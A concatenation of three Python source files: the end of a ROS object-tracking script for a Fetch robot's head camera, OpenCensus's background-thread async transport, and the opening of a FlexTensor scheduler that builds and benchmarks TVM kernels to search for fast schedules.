fetch_head.pan_tilt(0,0.8)
return
def joint_callback(msg):
try:
current_head_angle = msg.position[5]
except:
pass
# print current_head_angle
def dist_callback(msg):
global current_dist
global cx
global cy
global tilt
global dist_sub
global stop
transform = tf_buffer.lookup_transform("base_link",
"head_camera_rgb_optical_frame", #source frame
rospy.Time(0),
rospy.Duration(5.0)) #get the tf at first available time
pose_goal = PoseStamped()
pose_goal.header.frame_id = "head_camera_rgb_optical_frame"
pose_goal.pose = msg.box_pose
pose_transformed = tf2_geometry_msgs.do_transform_pose(pose_goal, transform)
current_dist = pose_transformed.pose.position.x
if (not math.isnan(current_dist)) and current_dist < 0.92 and current_dist != 0:
print "stop set"
stop = True
print "current_dist = ", current_dist
def image_callback(msg):
global initBB
global tracker
global fetch_base
global linear_speed
global angular_speed
global porpotion_prev
global porpotion_tilt
global traj_client
global intergral_tilt
global cx
global cy
global image_sub
global tilt
global flush_count
global e_prev
# print("Received an image!")
# if (not math.isnan(current_dist)) and current_dist < 0.85 and current_dist != 0:
# fetch_base.move(0, 0)
# image_sub.unregister()
if flush_count < 5:
flush_count += 1
return
try:
# Convert your ROS Image message to OpenCV2
cv2_img = bridge.imgmsg_to_cv2(msg, "bgr8")
except CvBridgeError, e:
print(e)
else:
# Save your OpenCV2 image as a jpeg
# pass
# Change image to grayscale
height = cv2_img.shape[0]
width = cv2_img.shape[1]
if not initBB:
initBB = cv2.selectROI("Frame", cv2_img, fromCenter=False, showCrosshair=True)
tracker.init(cv2_img, initBB)
else:
linear_speed = 0.15
(success, box) = tracker.update(cv2_img)
(x, y, w, h) = [int(v) for v in box]
cv2.rectangle(cv2_img, (x, y), (x + w, y + h), (0, 255, 0), 2)
cx = x + w / (2 * 1.0)
cy = y + h / (2 * 1.0)
precentage = cx / (width * 1.0)
precentage_height = cy / (height * 1.0)
porpotion = -(precentage - 0.5)
differential = porpotion - porpotion_prev
SV = -0.8 + 2 * precentage_height#(precentage_height - 0.5)
e = SV
porpotion_tilt = e
differential_tilt = e - e_prev
# intergral_tilt += (precentage_height - 0.5)
angular_speed.value = porpotion + 0.001 * differential
tilt.value = current_head_angle + 1.5 * porpotion_tilt + 0.5 * differential_tilt
if tilt.value < 0.2:
tilt.value = 0.2
print "SV = ", SV, ", precentage_height = ", precentage_height
porpotion_prev = porpotion
e_prev = e
# Displaying the image
# fetch_base.move(linear_speed, angular_speed)
# point = trajectory_msgs.msg.JointTrajectoryPoint()
# point.positions = [0, tilt]
# point.time_from_start = rospy.Duration(PAN_TILT_TIME)
# goal = control_msgs.msg.FollowJointTrajectoryporpotion_tiltbporpotion_tiltporpotion_tiltGoal()
# goal.trajectory.joint_names = [PAN_JOINT, TILT_JOINT]
# goal.trajectory.points.append(point)
# traj_client.send_goal(goal)
cv2.imshow("Result",cv2_img)
cv2.waitKey(1)
def main():
global traj_client
global image_sub
global dist_sub
global tf_buffer
rospy.init_node('dewey_fetch_nav')
tf_buffer = tf2_ros.Buffer(rospy.Duration(1))
tf2_ros.TransformListener(tf_buffer)
traj_client = actionlib.SimpleActionClient('head_controller/follow_joint_trajectory', control_msgs.msg.FollowJointTrajectoryAction)
# Define your image topic
image_topic = "/head_camera/rgb/image_raw"
# Set up your subscriber and define its callback
image_sub = rospy.Subscriber(image_topic, Image, image_callback)
dist_sub = rospy.Subscriber("box_target", BoxTarget, dist_callback)
joint_sub = rospy.Subscriber("joint_states", JointState, joint_callback)
t = Thread(target=controller)
t.start()
# Spin until ctrl + c. You can also choose to spin once
while not rospy.is_shutdown():
if stop:
image_sub.unregister()
dist_sub.unregister()
joint_sub.unregister()
rospy.sleep(0.1)
rospy.spin()
t.join()
if __name__ == '__main__':
main()
|
async_.py
|
# Copyright 2018, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import logging
import threading
from six.moves import queue
from six.moves import range
from opencensus.common.transports import base
_DEFAULT_GRACE_PERIOD = 5.0 # Seconds
_DEFAULT_MAX_BATCH_SIZE = 200
_WAIT_PERIOD = 60.0 # Seconds
_WORKER_THREAD_NAME = 'opencensus.common.Worker'
_WORKER_TERMINATOR = object()
class _Worker(object):
"""A background thread that exports batches of data.
:type exporter: :class:`~opencensus.trace.exporters.base.Exporter` or
:class:`~opencensus.stats.exporters.base.StatsExporter`
:param exporter: Instances of Exporter objects. Defaults to
:class:`.PrintExporter`. The rest options are
:class:`.ZipkinExporter`, :class:`.StackdriverExporter`,
:class:`.LoggingExporter`, :class:`.FileExporter`.
:type grace_period: float
:param grace_period: The amount of time to wait for pending data to
be submitted when the process is shutting down.
:type max_batch_size: int
:param max_batch_size: The maximum number of items to send at a time
in the background thread.
"""
def __init__(self, exporter, grace_period=_DEFAULT_GRACE_PERIOD,
max_batch_size=_DEFAULT_MAX_BATCH_SIZE):
self.exporter = exporter
self._grace_period = grace_period
self._max_batch_size = max_batch_size
self._queue = queue.Queue(0)
self._lock = threading.Lock()
self._event = threading.Event()
self._thread = None
@property
def is_alive(self):
"""Returns True is the background thread is running."""
return self._thread is not None and self._thread.is_alive()
def _get_items(self):
"""Get multiple items from a Queue.
Gets at least one (blocking) and at most ``max_batch_size`` items
(non-blocking) from a given Queue. Does not mark the items as done.
:rtype: Sequence
:returns: A sequence of items retrieved from the queue.
"""
items = [self._queue.get()]
while len(items) < self._max_batch_size:
try:
items.append(self._queue.get_nowait())
except queue.Empty:
break
return items
def _thread_main(self):
"""The entry point for the worker thread.
Pulls pending data off the queue and writes them in
batches to the specified tracing backend using the exporter.
"""
quit_ = False
while True:
items = self._get_items()
data = []
for item in items:
if item is _WORKER_TERMINATOR:
quit_ = True
# Continue processing items, don't break, try to process
# all items we got back before quitting.
else:
data.extend(item)
if data:
try:
self.exporter.emit(data)
except Exception:
logging.exception(
'%s failed to emit data.'
'Dropping %s objects from queue.',
self.exporter.__class__.__name__,
len(data))
pass
for _ in range(len(items)):
self._queue.task_done()
# self._event is set at exit, at which point we start draining the
# queue immediately. If self._event is unset, block for
# _WAIT_PERIOD between each batch of exports.
self._event.wait(_WAIT_PERIOD)
if quit_:
break
def start(self):
"""Starts the background thread.
Additionally, this registers a handler for process exit to attempt
to send any pending data before shutdown.
"""
with self._lock:
if self.is_alive:
return
self._thread = threading.Thread(
target=self._thread_main, name=_WORKER_THREAD_NAME)
self._thread.daemon = True
self._thread.start()
atexit.register(self._export_pending_data)
def stop(self):
"""Signals the background thread to stop.
This does not terminate the background thread. It simply queues the
stop signal. If the main process exits before the background thread
processes the stop signal, it will be terminated without finishing
work. The ``grace_period`` parameter will give the background
thread some time to finish processing before this function returns.
:rtype: bool
:returns: True if the thread terminated. False if the thread is still
running.
"""
if not self.is_alive:
return True
with self._lock:
self._queue.put_nowait(_WORKER_TERMINATOR)
self._thread.join(timeout=self._grace_period)
success = not self.is_alive
self._thread = None
return success
def _export_pending_data(self):
"""Callback that attempts to send pending data before termination."""
if not self.is_alive:
return
# Stop blocking between export batches
self._event.set()
self.stop()
def enqueue(self, data):
"""Queues data to be written by the background thread."""
self._queue.put_nowait(data)
def flush(self):
"""Submit any pending data."""
self._queue.join()
class AsyncTransport(base.Transport):
"""Asynchronous transport that uses a background thread.
:type exporter: :class:`~opencensus.trace.exporters.base.Exporter` or
:class:`~opencensus.stats.exporters.base.StatsExporter`
:param exporter: Instances of Exporter objects. Defaults to
:class:`.PrintExporter`. The rest options are
:class:`.ZipkinExporter`, :class:`.StackdriverExporter`,
:class:`.LoggingExporter`, :class:`.FileExporter`.
:type grace_period: float
:param grace_period: The amount of time to wait for pending data to
be submitted when the process is shutting down.
:type max_batch_size: int
:param max_batch_size: The maximum number of items to send at a time
in the background thread.
"""
def __init__(self, exporter, grace_period=_DEFAULT_GRACE_PERIOD,
max_batch_size=_DEFAULT_MAX_BATCH_SIZE):
self.exporter = exporter
self.worker = _Worker(exporter, grace_period, max_batch_size)
self.worker.start()
def export(self, data):
"""Put the trace/stats to be exported into queue."""
self.worker.enqueue(data)
def flush(self):
"""Submit any pending traces/stats."""
self.worker.flush()
|
scheduler.py
|
import os
import time
import signal
import shutil
import math
import tvm
import numpy as np
try:
import torch.multiprocessing as _multi
except ImportError:
import multiprocessing as _multi
multi = _multi.get_context("spawn")
from tvm import rpc
from collections import deque
from queue import Empty
from functools import reduce
from tvm.micro.base import compile_micro_mod
from flextensor.task import TASK_TABLE
from flextensor.intrinsic import get_intrin_table
try:
from flextensor.model import WalkerGroup
except ImportError:
print("[Warning] Import model module failed, please check if PyTorch is installed.")
from flextensor.space import generate_space_inter_op, generate_space_intra_op, \
generate_empty_space_inter_op, generate_op_space_with_intrin
from flextensor.utils import assert_print, to_int, to_tuple, Config, RpcInfo
try:
import psutil
except ImportError:
raise RuntimeError("psutil not found, please install it [Hint: `pip install psutil`]")
from flextensor.utils import get_iter_info, shift
import json
import random
# import flextensor.ppa_model as ppa
# from flextensor.ppa_model import measure_latency
LIB_DIR = "lib"
LOCAL_RPC = False
def flatten_graph(ops):
bfs_order = []
down_graph = {}
visited = set()
q = deque()
for op in ops:
q.append(op)
visited.add(op)
while q:
cur = q.popleft()
if isinstance(cur, tvm.tensor.ComputeOp):
bfs_order.append(cur)
for t in cur.input_tensors:
if t.op not in visited:
visited.add(t.op)
q.append(t.op)
if t not in down_graph:
down_graph[t] = []
down_graph[t].append(cur)
return list(reversed(bfs_order)), down_graph
def verify_code(stmt, target, dev_id):
if target == "cuda":
ctx = tvm.nd.context(target, dev_id) # just use device 0
if not ctx.exist:
# print("Fail to get device %s devid=%d"%(target, dev_id))
return False
max_dims = ctx.max_thread_dimensions
check_gpu = {
"max_shared_memory_per_block": ctx.max_shared_memory_per_block,
"max_threads_per_block": ctx.max_threads_per_block,
"max_thread_x": max_dims[0],
"max_thread_y": max_dims[1],
"max_thread_z": max_dims[2]
}
valid = tvm.ir_pass.VerifyGPUCode(stmt, check_gpu)
return valid
else:
# no barrier for other targets
return True
def build_func(func_name, task_key, configs, op_pos=None, rpc_info=None, rewrite=False):
if rpc_info is not None and rpc_info.target_host is not None:
target_host = rpc_info.target_host
else:
target_host = None
task = TASK_TABLE[task_key]
try:
s, bufs = schedule_with_config(task_key, configs, op_pos=op_pos, rewrite=rewrite)
except Exception as e:
print(e)
stmt = tvm.lower(s, bufs, simple_mode=True)
# print(stmt)
valid = verify_code(stmt, task.target, task.dev_id)
if not valid:
raise RuntimeError("Invalid %s(%d) kernel" % (task.target, task.dev_id))
if target_host is not None:
if task.target == "micro":
target = rpc_info.target # can be "c -device=micro_dev"
micro_device_config = rpc_info.micro_device_config
aux_sources = rpc_info.aux_sources
aux_options = rpc_info.aux_options
func = tvm.build(s, bufs, target=target)
mod_path = os.path.join(LIB_DIR, func_name + ".obj")
compile_micro_mod(mod_path,
func, micro_device_config,
aux_sources=aux_sources,
aux_options=aux_options)
# func.export_library(os.path.join(LIB_DIR, func_name))
else:
func = tvm.build(s, bufs, target=task.target, target_host=target_host)
func.export_library(os.path.join(LIB_DIR, func_name))
else:
func = tvm.build(s, bufs, target=task.target)
func.export_library(os.path.join(LIB_DIR, func_name))
result = ([to_tuple(x.shape) for x in bufs], [buf.dtype for buf in bufs])
return result
def eval_func(func_file, bufs_shape, dtype, target, number=1, dev_id=0, rpc_info=None):
"""
the target is preprocessed
"""
if rpc_info is not None:
host = rpc_info.host
port = rpc_info.port
server_ip = rpc_info.server_ip
server_port = rpc_info.server_port
device_key = rpc_info.device_key
else:
# local
host = "0.0.0.0"
port = 9090 # default port
server_ip = "127.0.0.1"
server_port = 9190
device_key = "local"
if device_key == "local":
if LOCAL_RPC:
use_rpc = True
else:
use_rpc = False
else:
use_rpc = True
if use_rpc:
# remote = rpc.connect(host, port)
tracker = rpc.connect_tracker(server_ip, server_port)
remote = tracker.request(device_key, priority=1,
session_timeout=10000)
ctx = remote.context(target, dev_id)
else:
ctx = tvm.context(target, dev_id)
tvm_arys = []
for i, shape in enumerate(bufs_shape):
shape = to_tuple(shape)
tmp = np.random.uniform(0, 1, size=shape).astype(dtype[i])
tmp = tvm.nd.array(tmp, ctx)
tvm_arys.append(tmp)
try:
if use_rpc:
if target == "c -device=micro_dev":
post_fix = ".obj"
else:
post_fix = ""
remote.upload(os.path.join(LIB_DIR, func_file + post_fix))
func = remote.load_module(func_file + ".obj")
else:
func = tvm.module.load(os.path.join(LIB_DIR, func_file))
evaluator = func.time_evaluator(func.entry_name, ctx, number=number)
time_cost = evaluator(*tvm_arys).mean * 1e3
except Exception as e:
print(e)
finally:
while len(tvm_arys) > 0:
del tvm_arys[-1]
return time_cost
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
"""kill all child processes recursively"""
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
return
children = parent.children(recursive=True)
for process in children:
try:
process.send_signal(sig)
except psutil.NoSuchProcess:
return
def exec_func(func, queue, args, kwargs):
try:
res = func(*args, **kwargs)
except Exception as e:
res = RuntimeError(str(e))
queue.put(res)
def parallel_execute(func, timeout, *args, **kwargs):
q = multi.Queue()
p = multi.Process(
target=call_with_timeout,
args=(func, q, timeout, args, kwargs))
p.start()
return Result(p, q)
def call_with_timeout(func, queue, timeout, args, kwargs):
q = multi.Queue()
p = multi.Process(target=exec_func, args=(func, q, args, kwargs))
p.start()
try:
res = q.get(block=True, timeout=timeout)
except Empty:
res = multi.TimeoutError()
except Exception as e:
print("Exception in process {}: {}".format(os.getpid(), str(e)))
res = e
kill_child_processes(p.pid)
p.terminate()
p.join()
queue.put(res)
def find_idle_cpu():
return 0
def find_idle_gpu():
return 0
def find_idle_device(target):
if target == "llvm":
return find_idle_cpu()
elif target == "cuda":
return find_idle_gpu()
else:
raise RuntimeError("Currently no support for target %s" % target)
class Scheduler(object):
def __init__(self, name, task_key, space, parallel=2, timeout=4.0, trial=100, number=1, early_stop=30,
rpc_info=None, rewrite=False, re_evalutate_number=10, warm_up_epoch=20, warm_up_number=20):
self.task_key = task_key
self.space = space
self.parallel = max(parallel, 1) # at least 1
self.timeout = timeout
self.trial = trial
self.number = number
self.early_stop = early_stop
self.task = TASK_TABLE[self.task_key]
self.walker_group = WalkerGroup(self.task.category + "_" + name, self.space)
self.rpc_info = rpc_info
self.rewrite = rewrite
self.re_evalutate_number = re_evalutate_number
self.warm_up_epoch = warm_up_epoch
self.warm_up_number = warm_up_number
def _warm_up(self, warm_up_epoches, warm_up_trials, configs, type_keys, max_repeat=20, use_model=False):
# perform warmup
warm_up_enough = False
count_repeat = 0
old_timeout = self.timeout
while not warm_up_enough:
for ep in range(warm_up_epoches):
warm_up_ret = self.walker_group.forward(warm_up_trials, policy="random")
warm_up_configs = [{} for i in range(warm_up_trials)] # empty configs
warm_up_indices = [{} for i in range(warm_up_trials)] # the indices
for count in range(warm_up_trials):
config = warm_up_configs[count]
for type_key in type_keys:
config[type_key] = []
for name in self.space.types[type_key]:
entity = warm_up_ret[name][0][count]
warm_up_indices[count][name] = warm_up_ret[name][1][count]
config[type_key].append(entity)
# hack here
# if self.op_pos == 1:
# warm_up_configs[count] = {
# "spatial": [[1, 1, 1, 1], [64, 2, 8, 1], [1, 1, 7, 1], [1, 1, 7, 1]],
# "reduce": [[64, 1, 16], [1, 3, 1], [1, 1, 3]],
# "unroll": [[1500, 1]]
# }
# hack here
# warm_up_configs[count] = {"inline": [[False, False]]}
# print(warm_up_configs)
if use_model:
warm_up_results = self.walker_group.query_performance(warm_up_indices)
else:
warm_up_results = self.parallel_evaluate(configs, warm_up_configs, number=self.number)
# the results are really measured
self.walker_group.add_perf_data(warm_up_indices, warm_up_results)
string = "[ "
for res in warm_up_results:
string += "%.6f " % res
string += "]"
# print("warm up [%.6f] %s" % (time.time(), string))
for count in range(warm_up_trials):
if warm_up_results[count] < float("inf"):
self.walker_group.record(warm_up_indices[count], warm_up_results[count])
# if not found valid config
if not self.walker_group.top1():
# print("Warning: No valid schedule found in warm up process, please use more trials")
#qprint("Now automatically use more trials, increase %d" % warm_up_trials)
warm_up_epoches = 1
count_repeat += 1
self.timeout = min(2 * self.timeout, 40)
if count_repeat >= max_repeat:
print("Fail to find valid schedule, too many errors")
warm_up_enough = True
else:
warm_up_enough = True
self.timeout = old_timeout
def _random_schedule(self, configs, type_keys, use_model=False):
# prepare model
if use_model:
self.walker_group.load_or_create_model()
# random by warm-up
for trial in range(self.trial):
warm_up_epoches = 1
warm_up_trials = self.parallel
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
return self.walker_group.to_config(self.walker_group.top1())
def _searching_schedule(self, configs, type_keys, use_model=False, early_stop=15):
# prepare model
if use_model:
self.walker_group.load_or_create_model()
# warm up
warm_up_epoches = self.warm_up_number
warm_up_trials = self.warm_up_number
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
# tune
minimal = [{}, float("inf")] # the minimal point found before
retired_indices = [] # list of local minimals
part = math.ceil(self.trial / 20)
value_early_stop = self.walker_group.top1_value()
early_stop_count = 0
count_incessant_empty_trial = 0
for trial in range(self.trial):
if (not self.walker_group.has_more()) and trial < early_stop:
# nothing to tune, re-warm up
warm_up_epoches = 1
warm_up_trials = self.parallel
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
continue
elif trial >= early_stop:
break
from_indices, from_value = self.walker_group.top_random(with_value=True)
# # print("check from", from_indices)
# get all directions
next_indices_lst, action_lst = self.walker_group.full_walk(from_indices, no_repeat=True)
# # print("check action", action_lst)
next_configs = [self.walker_group.to_config(indices) for indices in next_indices_lst]
# if empty
if len(next_configs) < 1:
count_incessant_empty_trial += 1
else:
count_incessant_empty_trial = 0
if use_model:
results = self.walker_group.query_performance(next_indices_lst)
else:
results = self.parallel_evaluate(configs, next_configs, number=self.number)
# the results are really measured
self.walker_group.add_perf_data(next_indices_lst, results)
string = "[ "
for res in results:
string += "%.6f " % res
string += "]"
#qprint("tune [%.6f] %s" % (time.time(), string))
rewards = [np.tanh(max(from_value - result, 0.0)) for result in results]
is_local_minimal = True
for indices, action, reward, result in zip(next_indices_lst, action_lst, rewards, results):
self.walker_group.add_data(
action[0], # name
from_indices, # pre_state
action[1], # action
indices, # post_state
reward # reward
)
self.walker_group.record(indices, result, random_reject=True)
if result < self.walker_group.top1_value():
is_local_minimal = False
# for local minimal value, remove OR no more exploration, remove
if is_local_minimal or count_incessant_empty_trial > 0:
top = self.walker_group.pop_top()
if top.value < minimal[1]:
if minimal[1] < float("inf"):
retired_indices.append(minimal)
minimal[1] = top.value
minimal[0] = top.indices
else:
retired_indices.append([top.indices, top.value])
# report best
if self.walker_group.top1_value() < minimal[1]:
cur_best_value = self.walker_group.top1_value()
cur_best = self.walker_group.top1()
else:
cur_best_value = minimal[1]
cur_best = minimal[0]
#qprint("No. %d | [%.6f] The best currently %.6f" % (trial, time.time(), cur_best_value), cur_best)
# early stop becasue of lasting empty trials
if count_incessant_empty_trial >= self.early_stop:
#qprint("Early stop after continuous no trials %d times" % (count_incessant_empty_trial))
break
# early stop because of repeating value
if math.fabs(cur_best_value - value_early_stop) < 0.02:
early_stop_count += 1
else:
value_early_stop = cur_best_value
early_stop_count = 0
if early_stop_count >= self.early_stop:
#qprint("Early stop with value %f repeats %d times" % (value_early_stop, early_stop_count))
break
# train and re-evaluate
if (trial + 1) % part == 0:
if not use_model:
# re-evaluate
if minimal[1] < float("inf"):
self.walker_group.record(minimal[0], minimal[1], random_reject=False)
for retired in retired_indices:
self.walker_group.record(retired[0], retired[1], random_reject=False)
minimal[0] = {}
minimal[1] = float("inf")
indices_lst = self.walker_group.topk(self.re_evalutate_number, modify=True)
next_configs = [self.walker_group.to_config(indices) for indices in indices_lst]
# use serialized evaluation
old_parallel = self.parallel
if self.task.target == "cuda":
self.parallel = 1
else:
self.parallel = 1 # min(self.parallel, os.cpu_count())
results = self.parallel_evaluate(configs, next_configs, number=self.number)
# recover parallel number
self.parallel = old_parallel
self.walker_group.add_perf_data(indices_lst, results)
string = "[ "
for res in results:
string += "%.6f " % res
string += "]"
#qprint("re-evaluate [%.6f] %s" % (time.time(), string))
for indices, result in zip(indices_lst, results):
if result < float("inf"):
# if inf, maybe this measure is wrong
self.walker_group.record(indices, result, random_reject=False)
# dump data
# self.walker_group.dump_data()
self.walker_group.clear_data()
# re-warm up
warm_up_epoches = 1
warm_up_trials = self.parallel
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
# the best
if self.walker_group.top1_value() < minimal[1]:
best = self.walker_group.top1()
best_value = self.walker_group.top1_value()
else:
best = minimal[0]
best_value = minimal[1]
# print("[%.6f] The best latency is %.6f" % (time.time(), best_value))
return self.walker_group.to_config(best)
def _q_schedule(self, configs, type_keys, use_model=False):
# prepare model
self.walker_group.load_walker_model()
if use_model:
self.walker_group.load_or_create_model()
# warm up
warm_up_epoches = 10
warm_up_trials = 20
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
# record best
best = self.walker_group.top1()
best_value = self.walker_group.top1_value()
retired_indices = []
# early stop value
value_early_stop = best_value
early_stop_count = 0
# determine start points
cur_lst = self.walker_group.topk(self.parallel, modify=True, with_value=True)
part = math.ceil(self.trial / 5)
for trial in range(self.trial):
from_lst, next_points, action_lst = self.walker_group.walk(cur_lst, trial)
if use_model:
results = self.walker_group.query_performance(next_points)
else:
next_configs = [self.walker_group.to_config(indices) for indices in next_points]
results = self.parallel_evaluate(configs, next_configs, number=self.number)
self.walker_group.add_perf_data(next_points, results)
for indices, action, (from_indices, from_value), result in zip(next_points, action_lst, from_lst, results):
reward = np.tanh(max(from_value - result, 0.0))
self.walker_group.add_data(
action[0], # name
from_indices, # pre_state
action[1], # action
indices, # post_state
reward # reward
)
self.walker_group.record(indices, result, random_reject=True)
# update best
if self.walker_group.top1_value() < best_value:
best_value = self.walker_group.top1_value()
best = self.walker_group.top1()
print("No. %d | [%.6f] The best currently %.6f" % (trial, time.time(), best_value), best)
# early stop
if math.fabs(best_value - value_early_stop) < 0.02:
early_stop_count += 1
else:
value_early_stop = best_value
early_stop_count = 0
if early_stop_count >= self.early_stop:
#qprint("Early stop with value %f repeats %d times" % (value_early_stop, early_stop_count))
break
# empty, stop
if not self.walker_group.has_more():
#qprint("No more points, end of scheduling")
break
# reload next points
retired_indices.extend(cur_lst)
cur_lst = self.walker_group.topk(self.parallel, modify=True, with_value=True)
if (trial + 1) % part == 0:
self.walker_group.train_walkers()
if not use_model:
# re-evaluate
if best_value < float("inf"):
self.walker_group.record(best, best_value, random_reject=False)
best = {}
best_value = float("inf")
for indices, value in retired_indices[-self.parallel:-1]:
self.walker_group.record(indices, value, random_reject=False)
indices_lst = self.walker_group.topk(self.parallel, modify=True)
#qprint("check next indices:", indices_lst)
next_configs = [self.walker_group.to_config(indices) for indices in indices_lst]
results = self.parallel_evaluate(configs, next_configs, number=self.number)
self.walker_group.add_perf_data(indices_lst, results)
string = "[ "
for res in results:
string += "%.6f " % res
string += "]"
#qprint("re-evaluate [%.6f] %s" % (time.time(), string))
for indices, result in zip(indices_lst, results):
self.walker_group.record(indices, result, random_reject=False)
# re-warm up
warm_up_epoches = 1
warm_up_trials = self.parallel
self._warm_up(warm_up_epoches, warm_up_trials, configs, type_keys, use_model=use_model)
# update best
if self.walker_group.top1_value() < best_value:
best_value = self.walker_group.top1_value()
best = self.walker_group.top1()
# dump data at last
# self.walker_group.dump_data()
self.walker_group.clear_data()
return self.walker_group.to_config(best)
def parallel_evaluate(self, old_configs, new_configs, number=1):
raise NotImplementedError()
def _parallel_evaluate(self, old_configs, new_configs, mode="op", number=1):
# # print("check config", old_configs, new_configs)
# print("parallel_evaluate begins...")
target = self.task.target
if target == "micro":
assert self.rpc_info is not None
target = self.rpc_info.target
total_configs = len(new_configs)
total_res_lst = []
try:
os.mkdir(LIB_DIR)
except OSError as e:
if os.path.exists(LIB_DIR) and os.path.isdir(LIB_DIR):
print("[Warning] Directory %s is not empty, but reusing it" % LIB_DIR)
else:
print("[Error] Fail to create directory %s\nReason: %s" % (LIB_DIR, str(e)))
exit(1)
for ep in range(math.ceil(total_configs / self.parallel)):
part_configs = new_configs[ep * self.parallel:(ep + 1) * self.parallel]
build_res_lst = []
func_name_lst = []
for config in part_configs:
func_name = "flextensor_built_function_{}_{}.tar".format(time.time(), np.random.randint(1000, 10000))
func_name_lst.append(func_name)
if mode == "op":
build_config = Config(old_configs.op_config_lst + [config], old_configs.graph_config)
op_pos = self.op_pos
elif mode == "graph":
build_config = Config(old_configs.op_config_lst, config)
op_pos = None
else:
raise RuntimeError("Unknown mode %s" % mode)
res = parallel_execute(
build_func,
self.timeout,
func_name,
self.task_key,
build_config,
op_pos,
rpc_info=self.rpc_info,
rewrite=self.rewrite
)
build_res_lst.append(res)
# time.sleep(self.timeout)
eval_res_lst = []
for i, build_res in enumerate(build_res_lst):
# print("build result get begins...")
final_res = build_res.get(timeout=self.timeout)
# print("build resutl get done.")
func_name = func_name_lst[i]
if isinstance(final_res, Exception):
msg = mode + " build fail:"
# print(final_res.__class__)
if isinstance(final_res, multi.TimeoutError):
msg = msg + "Timeout"
elif isinstance(final_res, tvm._ffi.base.TVMError):
msg = msg + " TVMError "
error_str = str(final_res)
found = False
for key_word in ["TVMError", "Error", "error", "Fail", "fail", "Invalid", "invalid"]:
if key_word in error_str:
msg = msg + error_str[error_str.index(key_word):1000]
found = True
break
if not found:
msg = msg + error_str
print(msg)
eval_res_lst.append(float("inf"))
else:
res = parallel_execute(
eval_func,
self.timeout,
func_name,
final_res[0],
final_res[1],
target,
number=number,
dev_id=self.task.dev_id,
rpc_info=self.rpc_info
)
eval_res_lst.append(res)
# time.sleep(self.timeout)
ret_lst = []
for eval_res in eval_res_lst:
if isinstance(eval_res, float):
ret_lst.append(eval_res)
else:
# print("evluate result getting...")
final_res = eval_res.get(timeout=self.timeout)
# print("evlaute result get done.")
if isinstance(final_res, Exception):
msg = mode + " run fail:"
# print(final_res.__class__)
if isinstance(final_res, multi.TimeoutError):
msg = msg + " Timeout "
elif isinstance(final_res, tvm._ffi.base.TVMError):
msg = msg + " TVMError "
error_str = str(final_res)
found = False
for key_word in ["Error", "error", "Fail", "fail", "Invalid", "invalid"]:
if key_word in error_str:
msg = msg + error_str[error_str.index(key_word):1000]
found = True
break
if not found:
msg = msg + error_str
print(msg)
ret_lst.append(float("inf"))
else:
ret_lst.append(final_res)
total_res_lst.extend(ret_lst)
for func_name in func_name_lst:
try:
os.remove(os.path.join(LIB_DIR, func_name))
except FileNotFoundError:
pass
# print("File not found when deleting")
try:
shutil.rmtree(LIB_DIR)
except Exception as e:
print(e)
# print("parallel evaluate done.")
return total_res_lst
class OpScheduler(Scheduler):
def __init__(self, task_key, op_pos, space, decay=0.7, parallel=1, timeout=4.0, trial=100, number=1, early_stop=30,
rpc_info=None, rewrite=False, model_measurer=None, re_evalutate_number=10, warm_up_epoch=20, warm_up_number=20):
super(OpScheduler, self).__init__("op" + str(op_pos), task_key, space, parallel, timeout, trial, number,
early_stop, rpc_info, rewrite=rewrite, re_evalutate_number=re_evalutate_number,
warm_up_epoch=warm_up_epoch, warm_up_number=warm_up_number)
self.op_pos = op_pos
self.model_measurer = model_measurer
def schedule(self, configs, method="searching", use_model=False, perf_path=None):
# if hint == "split_fuse":
# wanted_types = ["spatial", "reduce", "unroll"]
# elif hint == "fuse_split":
# wanted_types = ["fuse", "reorder", "spatial", "reduce", "unroll"]
# else:
# raise RuntimeError("Unknown hint: %s" % hint)
if self.task.target == "micro":
wanted_types = ["spatial", "reduce", "intrin", "reorder"]
else:
wanted_types = ["fuse", "reorder", "spatial", "reduce", "unroll"]
if perf_path is not None:
self.walker_group.model_path = perf_path
if method == "searching":
return self._searching_schedule(configs, wanted_types, use_model=use_model)
elif method == "q":
return self._q_schedule(configs, wanted_types, use_model=use_model)
elif method == "random":
return self._random_schedule(configs, wanted_types, use_model=use_model)
else:
raise RuntimeError("Currently no support for method %s" % method)
def _parallel_evaluate(self, old_configs, new_configs, mode='op', number=1):
target = self.task.target
assert target == "micro" and mode == 'op'
res_lst = []
for cfg in new_configs:
config = Config(old_configs.op_config_lst + [cfg], old_configs.graph_config)
try:
s, bufs = schedule_with_config(self.task_key, config, self.op_pos, rewrite=self.rewrite)
# stmt = tvm.lower(s, bufs, simple_mode=True)
# print(str(stmt))
info = get_iter_info(s)
l = self.model_measurer(info)
res_lst.append(l if l is not None else float("inf"))
except Exception as e:
print(e)
res_lst.append(float("inf"))
return res_lst
def parallel_evaluate(self, configs, next_op_configs, number=1, rpc_info=None):
# return self._parallel_evaluate(configs, next_op_configs, mode="op", number=number)
return self._parallel_evaluate(configs, next_op_configs, mode='op', number=number)
@staticmethod
def generate_op_schedule(target, config):
def _cuda_schedule_split_fuse(s, op, op_state):
# assert_print(op in s)
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "local")
# always cache read here
read_cache_share_lst = []
read_cache_local_lst = []
for t in op.input_tensors:
share = s.cache_read(t, "shared", [write_cache])
read_cache_share_lst.append(share)
local = s.cache_read(share, "local", [write_cache])
read_cache_local_lst.append(local)
# spatial split
spatial_axes = s[op].op.axis
splited_spatial_axes = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert_print(len(config["spatial"]) == len(spatial_axes), "align failed")
for axis, nparts in zip(spatial_axes, config["spatial"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
